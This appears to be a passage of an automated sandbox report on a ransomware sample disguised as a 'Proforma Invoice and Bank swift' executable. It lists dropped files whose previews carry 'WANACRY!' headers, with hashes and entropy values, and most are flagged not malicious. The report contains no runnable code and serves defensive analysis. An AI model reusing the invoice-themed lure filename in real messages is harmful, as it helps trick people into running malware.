                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4120
                                                          Entropy (8bit):7.956294551728417
                                                          Encrypted:false
                                                          SSDEEP:96:olD0dZgjhSxBDZV7GcQ6uGZRU0epHzVlRU1TU5/T8FWiWKcSQPJ:XiWDZVKZORbeVzVzUq5/RGcSQh
                                                          MD5:5714C857B25D08C7C0155C0BAA074902
                                                          SHA1:9BF57BE06B1A093E51CFC7374546B065A28DE1D4
                                                          SHA-256:ED944ABEFFEFC5319DCCFBA52E7C20A9B3B8EC08999C9B237ACE8FB4F4E9DC7E
                                                          SHA-512:93F3CDD0D1483A111F4ADB67D621F5EF7AE1217DB2FADA610B7969BE0D2F465762016DAC1A4E99770EBE7AD6FDBCB3552F226C02DFE1FA22D0079EED65007D60
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6056
                                                          Entropy (8bit):7.969358562556899
                                                          Encrypted:false
                                                          SSDEEP:96:oBPEKMYZyQINzZOiwseUz+EDtQSglkyWI+oeRbLGiBJzi69XtgZUx6TXlCW:WsY81DSEqLkMRiLGiBJGI81x
                                                          MD5:59473DAF6A5F93FEA67AC6324146A7A7
                                                          SHA1:9D0F2BAC74426AB60FBBB1FF2DB46DE439F127C7
                                                          SHA-256:D7D63FB8BE9AA83A828CA01D32BF5367ECD4F98AB80B1D66C20678BC016BFFF2
                                                          SHA-512:2FAE325167AB1B97BE93888F6B29B2E3391A02025323EFABEF5ED5E88E2A24F3A246F8AAAE93AD54BA61A8EEDA20918A337DEE4B2A4A18E1D001FAC864001F1A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10344
                                                          Entropy (8bit):7.980164762216397
                                                          Encrypted:false
                                                          SSDEEP:192:oLxEyeCD1PuX4qTi7nmpCITgXqNk755G6BQifowmWuoSi2Xqtw7eolbdFYUrsFaq:oSu1P84NnmpCAgXIkd/QifowmdoSXeXr
                                                          MD5:C7AE88951B41C81C9D900C5C200530F6
                                                          SHA1:003882570FA2E5F92BACB06FE8FF780492CB635F
                                                          SHA-256:743F64FF31ACCF87006A7E91B83352F7D26F52BBD9CD5406D031C6884501E56B
                                                          SHA-512:5C06D8BC7AF646D9C460E9956E9A07A7DC0ADBFD450AE43AA0D74C75624BBB444E4C30C52DB2F58056178BEC25293327B11C7B3B6EB392EC6128D0636CF2F8F3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+v....}..^...z..$..B..Fi.9:..cx1..0.\.......Q..?......*(.#......L...|H.]2E.........../y..}...w.m.]G.`Rb54.C..t...k.p.t....v.? ;...0_...&^.....aq.uCE;..}=E.k..;n.\...Uww...j.$...3....f...9.c7[.........8.7.^6%..}.F.kc...~..!...*........mV....h]....P'..........=<.G...[.......o.......M...Vw.h.2. ...q,...w.Z`.#....J.`.....[..'Cm..3..01N..fP......#...d?..]a....p...96..@..........z....p....$+Y....._.8>....,.vE.;\.....cLe.>..C)E.4..z.8..B....zg...+.h.....3~.{...I..@p..3...f.T_...Q.Zw7...Tg..Z....Jo....Q;%.O._.j..U.s..!...k............lo(u.7.&..j,3...+f.......!w..G>.S.jG...x.....)<...~B..t...uj.q.D>...c..<..3...<..\9........PsO...,.U....q.ee.X..z......,.]...^....ww3..N.Q.U..-.....x..h.....ab.m.k~j.{.....2H.....f..l;....:Lk<...Akr..P.].^...?......~..)".dU2.n89...AF'4.......A.>g......Uw.W9n.{.....gO.....!.. .u...;..u..;A...xx..W......#.e....M=.....,./.q......4..D...D.cU.6.h.N.. ..\/...c..X.. ..x7.C......R...JR...........
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7240
                                                          Entropy (8bit):7.976310964874543
                                                          Encrypted:false
                                                          SSDEEP:192:aM6biN+6lX77mAxMV9/ebKH/AX3dBMAf61+lsiFBUCb:aM6pUX3PxMHsHdmzwZ
                                                          MD5:432A7466710E8F3A15E16D3B24E8DD4C
                                                          SHA1:4FB0FAEB4B7E2484F9993BF0AA7F0D4D48901580
                                                          SHA-256:0BA29513181C96DABB2C610FF72B9D51BDCED97F09AAF821AE8B871AE38C551E
                                                          SHA-512:7778DC0D8354D0D6EBF528895C95C732DDBECB6793DC8694BE596C89F9A491570416E1E7BF85AC73962A6B66B7DCBBFF7BAEF6DBE794AF5937C36D97438FB0CD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....^?.#...!SI..fA...P..>..P.p+.....4..:G..L..X.4..l../.(.Udz..~..+..(&T| W+.X.qzT...u..5zQ..#......?.NX.....P....fy)\s&es_J%.W.K.k{.C....)y..`G...........UjVc....FMp.....l..A@..o. #..#-.z{........S...ft....,.......u..}z*.u.....}...C.0.#P..y.B.....D....+.......4.A.0.../.=#.5+Z...?.~.-....z..."Re..4...`..li.Y.E....g...../M.lho..l.V.....D.&....N..1.:.R.*.1.-#.Q...@9S...].w....b..'.@7Y....B..k>.OJ.k.d..0.......cG......0Q....*.~.*-B.......n..|.I.j@.......D>yP;....E.gB.~....&.*z.@.%.....R.V@s}.Z.se.{.Fkk..N...3....lu.[]s.jd....9...A|....I....0U....n..;...2....J.K.0...f..P.."V...9.7b*.I..&^.. .trg..j..k.c...W......!..K.<T.T..@<..8..(...).0.r.wi.b.b%.}...&.k&2QF...~...A*........X.(.(.....I..dh...5...Sq.T.t.j.m.....$...e._.5S.......b..h ...(&.t._[.. ...[1?Z.J7.....Pfk=1qJ..t&z..x.5.pCy...N.n.../.............&\9......9or.../AV.d9.aR.......<.V.v..=.Y.....)..).?....c..[....=...!..2.;..f....f.'..75,.XvQa.a...Dic".Fc...;Y...U..5p....r,..t<s.^.....9
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25624
                                                          Entropy (8bit):7.9927968853242435
                                                          Encrypted:true
                                                          SSDEEP:768:LhHZLpp2FztT9W+XCNsKrFC+6C15fPxUR/:9Zn2FZT9hBCFC+pe
                                                          MD5:BC22BBA2F593C2E5B5BC0FB7DBD94C5E
                                                          SHA1:EB6FA1701B504385D4563A500D8D015CA9E8AEF2
                                                          SHA-256:22954DB255EE5E23D4759474E3791CCEDC00140E43F226400816BF6CE406D03E
                                                          SHA-512:9DDED79C76FEC4E339657CE0DA03517DE93CE4025B30A5B9B596756C82F5B19101F58915AB95C95828C694D2B47D9D48C8EBD3487682674979CE90BED1B03673
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Crm]"....".=|..n.[..]......U..#.hhX,h...C.i...%.R...Rnn.x.<.O..7..1.i.Z.`......H.....*.$p. )..SxJ..+...r...Q..........B.(s~.....p..9..(..X.O.?...!...Y...4.F...{(...."Ku...,.T.4..a]..M/~.W..,.4.....w#h..ehGm..'.....g...<<..pQ...t.v..{.......b............0.{..Y.#......%..$Ed.\.....R...RJQ....1...8J..[.9.....A.....5....}.B.?..<..&W..2...F....+........N....d>...4.17..qcc n...7..q.s.R.Z...=\.4.U.#..].<.+..."...v.[.x]4*.G....=..(..0Uq:.f.W....EP..sK.-{...P....P.`r..m.Xi.<O..UZl.......o.............cj.n..G+.]>I.{+..)...@x?..$?.....j.OXm..:?..j.`.}.8.x.N..<n.V.z..vB..cuZ..p.DP...D..........w'.....T.....]n.f...o....!6.9.m.....;... .).A....X....O..Z.K.....b^..I...}..!....qE.l...C.nO8ml...+..%..%.-..-_....gm..]............(.kV..b.}2...f...........?.:2....[.1......r..!..Sg.u...j..Vu..V..Sh.......|...z..v..3\..Y..l.D..O.l.....:K.....$.Q.q@.......=.O.n....>.......E.h..-.M",.7.K{N.......:ta......Y..'I..<>.bK.]...<..g.Z.......].ZCT.G.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1784
                                                          Entropy (8bit):7.889098158309454
                                                          Encrypted:false
                                                          SSDEEP:48:bkladxPhtEKTuhU5KYool8l3JW0N+a6xn52WeDKg:oexpTuU5KR4i5W0+j3g
                                                          MD5:92923BB81741AF4495A0864F9C9AFEEA
                                                          SHA1:9CBC58FD945181FFE6F64900ABA394B958914F3B
                                                          SHA-256:73FAC76986B693965DC032414860A653E9E7EA9EE28B1660F6E7DBAA6ADB1B0B
                                                          SHA-512:2253726DB916AB2C12B486BA55B1634C15EDF326B65EE6FDAD2E683267D6AEF54A9A0F7A8A0251AF89A2180A6CA1FD0CD74A23C9DAC57DF1A830E8E484761CA9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Oa9`P..<........6Z.:-......Vl....;O...v..._.u..y..N..o..M...=1..".M.%..m..9#e..m[...%.5..|.|4_.y.D.I.4.%{.|.)..m...Q.1~..7..VS.~I...../w.!.....\....sd../,...M.4..z,.*.Oaqs5..#.......'.h..{].P.....sU..)G...G..b........3.qFM~_..<C.hN.Z|.N:.W~".............je"a3....g*$.;.z.{.0..N'.x.....=.NH..s.9.L.FJ.!...JuG."...5Ij.c.P.....~..5..&....s.\.}..'.Xn`rJ....us.n....P......-]....Q..Y..]L.-'3...UJ.K_../%L..S./P...p[........x.q....;%...3.R.-.......C....l....gE^N..5t.._...$.J.b.|K..1...g5..i.G..) .v.......3$.....O................Bgf...h...q%'..6..x...L.6......W#...c..W.t..sYu.....L....j.}H.+....."...J.-j.$>..T...P...b&?SL-....M..&."H.......[T6t.V?.R|.....P...>...=......7..1.X.........A.C.ee..P.J%P..^l....N.. ..[......... .../..Vt~.m%l...92....'.q..mU......2/.{*..<.2c.d9.....n.5*.+.9p....Bv|..U..........E..#.."......9......]....(.a.T..w..y.GU...4.&....p..=.].4h.4..n'."..#....*.~.../2.B..8..k....6F.x_.1`.9.|.@......]\..A.o.q.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.931686048642344
                                                          Encrypted:false
                                                          SSDEEP:48:bkIdblrD0SgpgzpqeS2hCNbdX383YLM+MNrGm/6JmOQ+bwDzRM:oicSgpgzp3oB3ZqhX/60+bCRM
                                                          MD5:C9664D7AD00F61DBA3FEAA345A372C87
                                                          SHA1:781BDAE991D856C53AFB345AB05BE07277CB2628
                                                          SHA-256:C66EAA5BF051F41281C4366195776B977D269D97DE0554BA08F708D92E6EFC6A
                                                          SHA-512:C1CBE4CE3121E218C5B4FE37983EA684F89097AE825D1C531BE4604085FBC23D58CFCB5B738E01401EB4D153FFDDCE60FF4D3EB330976FB85B63E096CC5277D0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........-'..%......o%.....L....-dI.`....b~......DM*p[.q..Y./|..F.rib.....L._..-..N.Q.BU`..].rcAj.$.....hC..9..L.j8#jv.9....`.....6..Mv...;{...L.*.....:...A...<.&.+.(X..G...R.}v@....J...8.....k...;.CN.JN.......D.E.....t....M.Xo.L.]u4....E8....o....m.......T.cB...O..!..T....c..3..vbF.X...@..O.$M.qy.v]..GZ.8.~...*.|.`U......y1.n~..-"|.V...... IN2..{..P..ekM.._k..y...{%.S.c.>...v..&`h/.(....*#.s....MO.b..I..kVw....f".r..gh....D.X.[+..w..7..\.EkC..'PB3.cS9x6.t....J.........V.X&....6.l>...9..eM-e..d..X.c....Ms...E....+03.K.L.t..4B3..S...v.d.........m.x..q(.....W....3..8.a..:.].$n........?:..%l\I.3..P.;. ..qo.^Oo.N..g........D...!.D.w....u.#......O...I<...Y.....}.!...9.f.(.$..M1...........Mk.........C...m...z.?....L..6>.E.J.75y.<........X(>..z.g...@....$>Ra..M........S5.^.....#.f.e..&/}2..9.Y.....jur....|..%J..?R..M......mX.;=...z&'.;.1.a.Z.Ar.8x..v.V:6C....T.\b(~.[O.k..f..+..f....r....X|....[........W.....=@s....<.f].75...3x..~..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4072
                                                          Entropy (8bit):7.958146459709032
                                                          Encrypted:false
                                                          SSDEEP:96:oNc672/lA2H5PNZAFP7vNnGalRxdJ5sayDU8LVAKvm2S18zLFur:n672/C05PNG1hb3O+Am2OUS
                                                          MD5:961AAD31974B78A42316DFD33E2A9C52
                                                          SHA1:9BC6C217300813B94151A2754DC9C29C07029B7F
                                                          SHA-256:CC69CECB3368CED2530A9FD6962243F5B081874493CDD93889D9C0389AEBC937
                                                          SHA-512:96F982E58EF99677BE66D6FA3F8045977BE5377B3E1EEED22F9A71C2CE1006ABB5A996C5A7CC86CB0302DB1AF1E3A7B194F37BC93B10A674AC78C4F173A7B2A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Hk....n......O.._g..n.......\...jJ...P. j............>.cK.]i.*_a.R(..c.cM7.........p^.I ........$.Ot......Bu......8x..R..)...h...9..[<..'..s......$..\..<..*..S;..k.d....,;|<...H.B.B$.L...Z....d....O[os>...c..|(..*1....@+....T..8t.=.'W..............e...67#...w.nb2.]*T~...2.J5!...b.C.......b.{.......Pm.*...chF.m...@.B.......z.V.i=gMJ...4Bl....<.P..lVLK.0...m.H...?..+c..8m....ma.< j.X.2.<............W ..7.......".pL..g..n-....].z.....v.E..._..i{./..\?..>..Ue.L\.T{.......Wr|.[.8...j.]l.R.B...x...]..K>...r....I.;-...qCr;.A...7\....f....X.p.Ly..7.......g.]..?.uS6XFd....A/....q..G....e...{.{.<y.@?C ..e(.........#.w%.L..M..`.z~.."?i..y..Q...l$53O..........xLE.v;Q.).....7*}/OPt..#...c..,.*.{.~..$.,.`..!......<{LZ..i.VW....m.6..!..m:\"J.~..x..%.3.YV.(..oo.a....i.!xB.q..HQ.nx}'.F.].7..0......7j.f.q%g..p...F..W..{\\.Z.6.}s.V..a.......iK..:.}H.-..cI.....R.2..v.n.Y3....f.e,.....*1..Q.=....*`=D..I.......,~t.4.Wr..a..ltJ.r3...-e..AK3.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7000
                                                          Entropy (8bit):7.973103432139965
                                                          Encrypted:false
                                                          SSDEEP:192:HleKCK9X4oeuIGCFKl+COvH6F/K9DvsdsS5MbS80et:HqKUgt8CSu/mDvsd9sT
                                                          MD5:F088898F1ED64032A077C422A7895560
                                                          SHA1:92826C8BAAD83B2465C85D611EEADDC99AD10625
                                                          SHA-256:E2BBEEC8DFA270D6958AE9422C98BAB85BF536B8A61C75AF57EF36ABFF371F34
                                                          SHA-512:C5C27A3B5377C514FCCA751C9F297441C3FCBDAAD39E03089D89255FCFBD2EA40166DAA396F7AD9305F98F3464CBB15060DE89F9EAFA440DF1DC2EDDE339713C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N..$)..oQ..L..,=.9.....u;..$..]..H.[.!.%.5.3.h.....% .....a1D....P.2J..A..S...q...$.E....}.D;d.O.....%b$.^.)..9{.Lp@...Y.a(..%.U......E.6F.$oW.Q....EM..Y;o1iC....`qd...).`J.aE..h.a....=...P..Q.....BatR\K-..O.O.A.'_*..9D... ...Z..~b..g:.".TV.=......;.......y....H%....C...A.raV.......[F...\.....[..+..U`,...-a.a42....Gho_Gd..H...S..FHY..,$....#A...515Q.(.o+~.....:z.....s....8@...].'.$I.M/.g_.....o.B......-2z...|....]...&..T...qY..Z.a4...<".N.j.A.....4.4J..S......O.}..pq...1.S~y....};..`.......M.\.h.Gs.~...{.?\&..-.?.r..$....|..0q.]X....7...A,.....O...L...Kk6....l....3].._s+..D..'5B.p.n...H.zR.$.(..h...fo.;.g^KdD.....l$.*2c>..,v.cy....%.u...'4^O.[k...ml..R...*...7,...........+....y.*=.....|..#D.)6..>.kql..+......R...*.T..<V....>..U.%..).....r....h= ...H..../..:\.4..*.w.sK....F...........~.:u.......V9.. ..)d.)..#.a..L.N....^..S.sj.s..9.C.h...h..../3.0....Q..~.......S.=Obvj.F5.o#..............X.e..,>......*.......QQ.5t....iS..Y.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2600
                                                          Entropy (8bit):7.924568907519894
                                                          Encrypted:false
                                                          SSDEEP:48:bkGGVJ05SHKS5zTu1TCVFXO7LEqSe2Z6tMrfA9ZnWMkl7U2PvptqIE6:oE8rM1/2Z473nr8nDX
                                                          MD5:CD9F6171D4630B1BEDD643C6117A4C15
                                                          SHA1:59E528FCB48E21933AC3E959189A691D80CE6496
                                                          SHA-256:07939355FD1394A8B9BEE78566EB84F28AD5243CD7B9610D851B0AF085EA41F6
                                                          SHA-512:AE821C1518CC7A420680601D2FBD1EFA67066FC9B5965704E5B34F40270EC296B4E30942B1EAED62C1FF3CD81C579B9F45E9C3D99AC1A232269952CEA1467663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M...Da.p>.Z){.w.vs..r....7c-..e..NP..a.b..............@W..qNC.W...:.22...|.x2...x..Y....)...1}.dt......P,...L..........*.gd.....9,..J.`..[.J..U....%d... .....?B\6...../...A.Tx.H,...8u..I.XD#V..j..Z....r.~..u..I..f.2..&....x..{'w.X.z....Ic.e.!*|............d-..N..#)..._!...D|!..T3....ea.v...... ..1...3.b..5.5....{}<.)..?..^.:;F.5.\.9@4........E.....]......F...B+3Cxy.y5......$..~.....RF.<..4N..8.ry..u...&f!...w... .nO...v;.j......I.O$..x.xZ....g..>)J....+.0...kJN...J...d..Z....u<o..li.......o....R...oX..../...;<..tD..'.3b..r.!.r.6i..>.0.~Z..[..........Z[...b6.B...Y..,...R..p1'..V..@......i...*...6(.)..M. 1..y....AE?...-.R..G.`.......\.(l\h.K....FQ...D{.........w...E!]....<.n.R.T~.,...1.V.b?!...O.....<.T.6.l.q!.1*."=..RU...c...M4iT.^E]&.l...]$..My..;.....:.h.f.. .r.V.v.P..U4iX..%Y.5.[--r.>a.8.OF.GL........].h.A..J..........@J.=..y..g."TZ......V.{.f..i.5....~...X...s.Z]L.!.+-...._....<..6...T...gZ.N.o..7....,..w,A.^I..."...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1576
                                                          Entropy (8bit):7.859725027112348
                                                          Encrypted:false
                                                          SSDEEP:48:bk7zjPFxiVljfhajJpEUP48npdRqAT2oqp6XDhGqf426D:ofJxyld8pfMi2oqIXD742A
                                                          MD5:D1467EF0FA8F2EE7C4A037A3AAF10D67
                                                          SHA1:1367522B6E663EBA4559BA1EB8E52F6627358AEE
                                                          SHA-256:285C08022843C40AB826487598B6609417C05F97E3DD3EB1D820633B1E9E63B9
                                                          SHA-512:AB88449B1F76AC16BF06B644FE07AFC7360CC99990E715797B7522FFCAB45A96AF5741B3944397403ACD38F2D0F5104E60CDAEBEB9F38565B037FDC211E284D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....S.H...w.\b...BF.i.L&>..%.U....=.8_v.._..8^.=&... ........{Eob. .%.T(y8&c.>X.=.'..\)(..o?3..HA.N7...H...2...I...,E.Vi.}.Z..*.r...9..C...B....P..M.jX...n..fH..R.......6......kE1..1....=k..'.7..*.q....C.&?.Q... .......(....:..^..,i;.@5...f...F.4.K....................y8....V.O...T...Nz.Q...........Hu..d..e....r.@.......K..e7..[F.v.....A.d<....;f:.W.5.5..&..'..0...k..i...C.V....I9b...".+.A.4.....o.....\.3oXJj..h...`..L.PuH.+.L..9...AV.PE...........\.X......?.tXW.[.3w......V2..-.:...5.....]%Vi....jrSZ.....X.?..W.b.Z..<........!Z....j...Y..@.-.J.y.u.E..2M.....i...".....u....z/..5@v.......X[.J6...DH.D.E5zN!.....*...3./cP.....A,......Z;...{7`..w*.".".K....B.^2...*..........]d.`.....Y.G{.....I..K..........m+.C[...X..K.f@U...x+..=.=b....f\.}As.{ #[.m...[,..*.z.\.~..C".Of.\....^....O?rR_.9.d..... S....Z..).....G.....RD.d_<).`.L.X.MO..H...D.@..p.I.SC].:... .......w..:|W..v....*..i.. -4};.......4..1}5N3\..\...&......3...i~..oj.....c..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5480
                                                          Entropy (8bit):7.969839016170105
                                                          Encrypted:false
                                                          SSDEEP:96:oZiV57mA9LLVJtzLNpaom1og59i3jpZeeSGx6MJPH72x7fL51POv13+BVwOrvRNA:si/mA9LZnHat6tTSG8M9Y7fTOvEBVwOI
                                                          MD5:A4BB551A4B91BC7FF553D103DDE8392F
                                                          SHA1:04876A77099A254026E4750917544A93AF745B52
                                                          SHA-256:C49C315FCDB9FF2CC8A1CC93C7751AB78E28F92449A44038488B15A853FCE0F9
                                                          SHA-512:6F0075F554CDF8D4D2276C88CF7B1A222EAEE04F5F672FDF9856E1466F43144D7324BBF6632E4240908316114E536E4926B47C7FE6A003518A543DE230922338
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......iYN.s.].(...lX.......9C..U.?.>.......*......IZ.d_.E!.v....G.4...z...?_..N.GO,..3y-X.....U.._.=..X.i....).@o...p)=wv.4.Uli..e2y..o....(..tc.n(.c\.Ud...&.>.l!B..+....3..K.5p.-dV....o....LC.u..=..x}....\O%E.i12..I.x...n.Wk..[. .\.[3#>.,.9.....G.........h..[....a^ns..{M...|X.*....eAc!..U.}l.-X..Gw:.N.......=...2|.D..v.....@.?...O.HB.IlvQa..K"=.....U..ou.#9........6.|.4....W.]...|.'"~.#..,?.z..Q$..5d!...,K0...l.3...G..x.V......:.\.:.n(..L.v%92D....&.6....Y...qV.4_...........q.N.:-.OC..y..{.GC....PP....(.......6..Uf.....b.pu...OY..c..]........z..._....8..S.#q./.m`.I^.........+..aZ.E.C.)...t.*..^.......N.W.k...5..;bFob.e|.......d;.4A.L=..X$.-..6.u4.B.G...95..w.c.F.....VMV...p~.}.QA.q..%E`.c.....M1."K....^..] .Ca~.%.....f,...Z^w.r$Y...*.%...3c."...S.......La.C...._z........._...../"...On9O.>..4#.[......f.Q.:1..;...f.L.r...L.t..h..U.I......=./.g8d_+..0..5..8QCw.6..n.Z.H..o1Xk.....Ls.8....=O...0.._.X.'...p..+..XB.`.>P%.z.,g.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.843138110116323
                                                          Encrypted:false
                                                          SSDEEP:24:bkG+PxQwyuqmyt6qzpMkOrXD44IxBslHgbLPzajRGWopo3tJqQBUEGBv:bkG+pDfk42jh3kGho3tJLqr
                                                          MD5:E6AD5CE4E4B1A2CD99354BBC8F1E6AFE
                                                          SHA1:83E2A6F26902F17610B262D53F3C08A4D6F06DE5
                                                          SHA-256:35A22E7554A6B345E49CFAA999A5ECBC6B27E0A8ED0F45E6F939EB19CD44B0A1
                                                          SHA-512:48609FAF6A747FABDD18EACEE7B762D93710148EE180EA2945D935E47DDE0BA1D6CBF2E98DF45338769194C179D1E627B37D257BEB32FC9AA79E0DEED12AB55B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......C.&.S....}_..5.B.*S.+...4.q.f...$.{8lj>...3..2..>.^.F#7r.....%.....n.Q.....A..Gq......|q....[.. ...r..w...w~4<}.38....g..;,W..........o..l.'....-3......flt.4*.R4..X..]O.n.e....vk$...}...8..1....&.K5z?s-Q.........L.........&0f.UdL..!={`..9..._................o..O/jqT.(..KF......EQ =...=t....o.c...*M=.e.2.{.`...+eM#..C.A...|.f.psb?5.......W..+n..d......l.......*7.?D....=Rl]..@.......@d7k.-0o.+.?....+f..5..'.C...".4...8..91..GX'..)S../...N..#....L.d8....6o....k..@n3..O..W[.Y.!...w.'.f..8@.t.u..W... H........bB.<d@._d.....'.<Wv]S......3A.P..p....-....#;..My...}.2..../......^:........J\..../..P"J.K@../..b....73.PonN..e%........}.v>rJc.....OagcR!....&....aH.../.y....H..zd..ud.D.....5n...d.{.f':.P.m..E.0.....*.gEY..{.9s&@H.b=..M.X...<..._P.e8`.U.u...%....?K..c......-.];..".:..."..;+Y.4.......S@.[......!..W.z....@2E.{.03. ..@'....5]..b]...Q..oV..6.>...2"..7.......`.........>JG.N;C@......Z.7f.IX:z.>N.p..{^...o..j
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1656
                                                          Entropy (8bit):7.888374146353715
                                                          Encrypted:false
                                                          SSDEEP:48:bkmwfYn1QnZ2oCVkEbRoPs/vWf9V1zpM0L:o+n1Q8V7bU8v+VtW2
                                                          MD5:F84FD9EB1699D67ACDB14EDA66B04474
                                                          SHA1:BA6DF842EEBBE7C29E2355A8102293F728ED1BCE
                                                          SHA-256:BD8CBA01B50C337C0F2E5F19FA0C69DCDC5F38717DF77BC91B71D25DD9EAC8B6
                                                          SHA-512:D07F52CCA5010917E3734999DFD2C5B2E09F9C9C231FBB7D02DCB9341CAF8853E91293B525A81FEFB30724959B21A91A07345DA0CD2968E2609E6CFEFF363049
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....r.....cY.R...m..Uq...|..6.N`...}[.........V..*....v.1....A;..#...{....)....tr.)..W..tq.....X.HE....D./..!.qTQ...NY.If`/...U..D2w.9.5.N.`....[....%....2r:].`...xv......8J.:.-p....+...".O.ab.W..........r$..9..............':......t..p...#.tRp(.a0....Y.......J.e...r.....Q....j.....o3/.Y.w.....B.U&Bq.............y(/].ajA86j8<..k....a...@1.`.N-?.ls.#2gM.../..J.r}D7m.$p..."..qs8..m.`.8as...Y.B.U.cg..^g[.>........e.2h9bY7c.zyq^Z..$.hEvu|.q....J}Z..!Y.<M..1."!w..KM.-....d.<b..Q..<.}.#...,.q.V.V..0..%ozF..,...:...;#.G..1.....J.+^dw......&.Sv..@...?[@oL./.a.~....t#.7...E4.d....\0.+3#..QYM&.n.x..H2.).cH....5..6....i.Q..dn..>6.T.).xr.n3j..9]1.4z!)....O.6G......F39..k..sD....n.CO.-}.0.Z.Pq..7{f(...q.O.N.....'......JT'.3F.Y...Y...N~.....^N...3...\,.5-..._..$......s.x..e....Z.K. +X00.N....k....0X..E...2..........O.z4...Z......l^...d_j........{..m........Q.oL-.P.B..U..M....&..........A.....:b%.q..3..S=...Zm,W..!.CJ.......p
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1800
                                                          Entropy (8bit):7.887912202904043
                                                          Encrypted:false
                                                          SSDEEP:48:bk+I3LfP34ApH0JYOk0O4tcLQhdrwkWBT8z4AlUNiuo80rSLt:od37PIZ+lYrRWcXumy
                                                          MD5:8B440DA66C65E1EDBF6550A3F4AA7969
                                                          SHA1:B2674A6455B1F28E10C26383E7F539EA6EFA9F5D
                                                          SHA-256:22E546D332B3DAD9175F2BCB4DEA8A14B9235FD334B194656C3D9B79A34D2D82
                                                          SHA-512:74EE7899BEF4CAE62DFF6415D595EDCB5BA80494A7D15B853D1DB6DF634FC94060B685A15D5CABF8FFBB05371D0AB391DFCC98E0BBF7FF09EE8A7DA8FB95C519
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....,....(..{.o..!@..4.L.....7....L.~G.8.....?..R ..`.cuH<..8H.}f.0..Pi..[..V....:`...y..,U..P.ug..n...(..B ..y..I2@.`L.;?bq?...h....x..D..h/*V.O..q.#y.....e...K.IX.^..D......}0.W...chs.k....Z.4..i.sA.8.a..^..... .\d.l.wm&>6...c.84.az....>]..}g.......qG...............[...w.....Yg..4.:.b.....q&...,jR:.&...`...`z..X&... .d.O.?..V.c.)!u.. #<.`._..6...f.u..9`..fU~....B.NzA.`...B.s......Yw......dE....Q.%..0.o;..o.G\H.a.....L..v....c..t..b..M.R"H....%...b.~.'.Jt.....I;c...s.E.<..R.v.../Io.$..*.Vb..e..>\p..G...HJ...u.....Pm.....\hQ...#m..0jx.@.z~ .zg...d.d.J<g.-..x&..T.g....[......[...Ae...._w....R..^eZ...~.M1Z.FxZ|..-.Yk..?...T.(t..I....x.n...O.._c.9@....d1.{..3.5..d..a.1....m|..SSB..j.T.q,t#..A=....0...X0I....v.!..Bu).C.;..*.)......J...<.8.>2K.....%o.E..{.?.....}0]C.....d-oI5`.....y...JDlc.Ec..%.\....77.|.@B.0.t..q.ojj^.l(.@g...Re..E..4m%=......M.ED..;."i[..8,.^.u)..X.Q..B..P\..qu.8D6..y.(.]1..........$....o.r.:...5..z^...{i9....$.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2136
                                                          Entropy (8bit):7.905389981186901
                                                          Encrypted:false
